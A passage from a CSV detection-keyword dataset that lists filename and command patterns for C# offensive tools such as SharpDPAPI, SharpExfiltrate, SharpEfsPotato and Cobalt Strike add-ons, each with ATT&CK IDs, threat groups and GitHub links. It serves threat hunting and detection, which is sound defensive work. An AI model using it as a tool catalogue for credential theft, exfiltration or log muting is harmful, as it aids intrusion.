T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" +"*SharpCradle.exe*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" +"*SharpCrashEventLog.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpDcomTrigger.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*SharpDir.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpDllProxy*","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","1","N/A","N/A","6","567","76","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" +"*SharpDomainSpray*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*SharpDomainSpray.*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*SharpDomainSpray-master*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*SharpDoor.exe*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" +"*SharpDoor-master*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" +"*SharpDPAPI backupkey*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpDPAPI* credentias *","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI* vaults *","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.csproj*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.Domain*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpDPAPI.exe*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.ps1*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.sln*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI.txt*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPIMachine*.cs","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpDPAPI-master*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpDXWebcam*","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","8","1","68","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z" +"*sharpedrchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpEDRChecker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpEfsPotato by @bugch3ck*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"*SharpEfsPotato.cs*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"*SharpEfsPotato.exe*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"*SharpEfsPotato.sln*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"*SharpEfsPotato-master*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"*SharpEfsTriggeEfs.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*SharPersist*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*SharPersist.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpEventLoader*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" +"*SharpEventPersist*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" +"*SharpEvtMute.cs*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*SharpEvtMute.exe*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*SharpEvtMute.pdb*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*SharpEvtMute.sln*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*SharpExcelibur*","offensive_tool_keyword","cobaltstrike","Read Excel Spreadsheets (XLS/XLSX) using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpExcelibur","1","1","N/A","10","10","85","19","2021-07-20T04:56:55Z","2021-07-16T19:48:45Z" +"*sharp-exec *","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*SharpExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpExfiltrate.csproj*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*SharpExfiltrate.exe*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*SharpExfiltrate.sln*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*SharpExfiltrateLootCache*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*SharpExfiltrate-main*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*sharp-fexec *","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*SharpFtpC2*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" +"*SharpGen.dll*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 